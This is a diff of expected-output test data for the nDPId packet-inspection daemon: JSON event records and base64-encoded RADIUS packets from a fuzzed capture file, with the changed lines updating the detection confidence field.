01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998257238,"pkt":"AAAMB6xAABRP+4rqCABFAAKrtPRAZP8RAAAKLEAexuIZPnIQBxQClwAAAZUCj2QnnzQfo5ejlXtjb\/umlWwaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNib4OUAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTEwOlZlcml6b25XaTZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1528998257456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998257456,"pkt":"ABRP+4rqcNuYVcUnCABFAADAC6FAAPwRSEHG4hk+CgxAHgcUchAArH\/HA5UApDEA20uf1YbOtjZ3cBjhL8UBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjczExLjNncHBuZXR3b3JrLm9yZywwNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG53dCBwcm92aXNpb25lZE8HBAEABwBQEiTxEJAlgr8Mmnu4S7XiSkM="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1528998260755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998260755,"pkt":"AAAMB6xAABRO+4rqCABFAALbIUZAAP8RAAAKBkAexuIZNXIQBxQCxwAAAZYCv2ld+75N6br3Aseqn5DA044aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2N2hbIql0ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNVctNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6ZTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1qBgAAAAZRBDU2TzoCAQA4AzAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjYjExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaQQAAV8gLClS8c3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAgFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQQAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS7YR7iU74FmJPxnRlVfzqUQ=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1528998260831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998260831,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC7JAAPwRSFTG4hk1ClJAHgcUchAAkW2jC5YAiay3x5utrN9ef0\/5StJEFS4BNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWUvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMVwwAAAwBf\/xQEkJeR7D8c3a4+60+qxnUicM="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998260959} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998260831,"pkt":"AAAMB6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1528998261024} @@ -362,7 +362,7 @@ 00528{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998279600,"pkt":"gBRP+yUAcNuYVcUnCABFADClC+NAAPsRSSPG4hk1CgxAHgcUchAAkf3TC5gAiaqvlSxwmtnYRSbHVUGZo3ABNTAzMTE0ODA0MzI2MDg1ODabd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEnv5mqy\/X1rSPl3U34VdPzc="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01329{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1528998279797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998279797,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUlAAP8RAAAKDEAexuJQNXIQBxQClwAAAZkCj3rtQEtjvnzCegZr\/ks\/YsIaCgAAJQAOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIq2HATUwMzExNDgwNDMyNjA4NTg2QHNsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlaNcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDA4N2E5MjI1YiwgNWIyMmE5ODcvFWM6MWQ6ZDk6NTM6MGM6OWIvMjM5BASsFAEQIA5WWldDMlRlc3RMYWIaDPYAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyCoKU3RhbmRhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998285403,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1528998285403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998285403,"pkt":"ABRP+4rqcNuYVcUnCABFAAClDBBAAPwRR\/bG4hk1DgxAHg8UchAAkVlTC5wAid6Vm2Prh8ff1igjujrPQY0BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWPjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmELODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEvWoCrn3KdnMpOYKRlABwJ8="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998285592} @@ -370,17 +370,17 @@ 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998285529,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1528998307737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998307737,"pkt":"ABRP+4rqcNuYVcUnCABFAADhDH5AAPsRSEzGBwk1CgxAHgcUchAAzRApC54AxbiGAVeQd4nw9IQcbiUA5zoBNTAzMTM0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3T0oBAnZIFwEAAAEFAAD4l2tdy6yk\/88l9cpE8l40DAUAACRoRug2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1528998308061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998308061,"pkt":"AAAMB3BAABRP+4rqCABFAALHIU9AAP8RAAAKDEAexuIZNXIwBxRDswAAAZ8Cq9PofZmSNOhQyNOgaRsyJ1QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNYUjEwGgkAADghDQMwNxZbIqmjATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b243aUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkczEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6JQA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDhFRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADqGOBIENmf79hbM4GZs1ZYAwIAIJdiOR0aFAC4V8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhBhAFfICwpUZXN0IExhYhoJAABXyA8DMRoKpwBXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaHJlY3QaDAAABYNHBsBQSplQEuURqTNatQDGcJFc00xUIbY="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":16640,"global_ts_msec":1528998308249} 00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":16640,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"ABRP+4rqcNu2VcUnQQBFAAEwDINAAPsRR\/jG4hk1CgwlAAcUchABHKZIAp8BFMKP3L7bmNggOPWkTIavpgoaCwAAV8gbBVNQQxpuAAABNxA0723Z5fHoC0l+gadvadgzfaSzCz27rPwxopk71TEDK1VIm8mW\/vsFxUsHy2TxysAjZO8RNM3E07NOswLZR1Yjduj2RuApthb0mlkqWQZZpjfg4Vd1eYt2TqpojJTwm8thaNHCskFYATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLiUAYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhOTUyL2YwOjc5OlAwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFeVBDTwYDAgAEUBIoTJCJ2HxVvdUlAOn56UH9"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998308483} 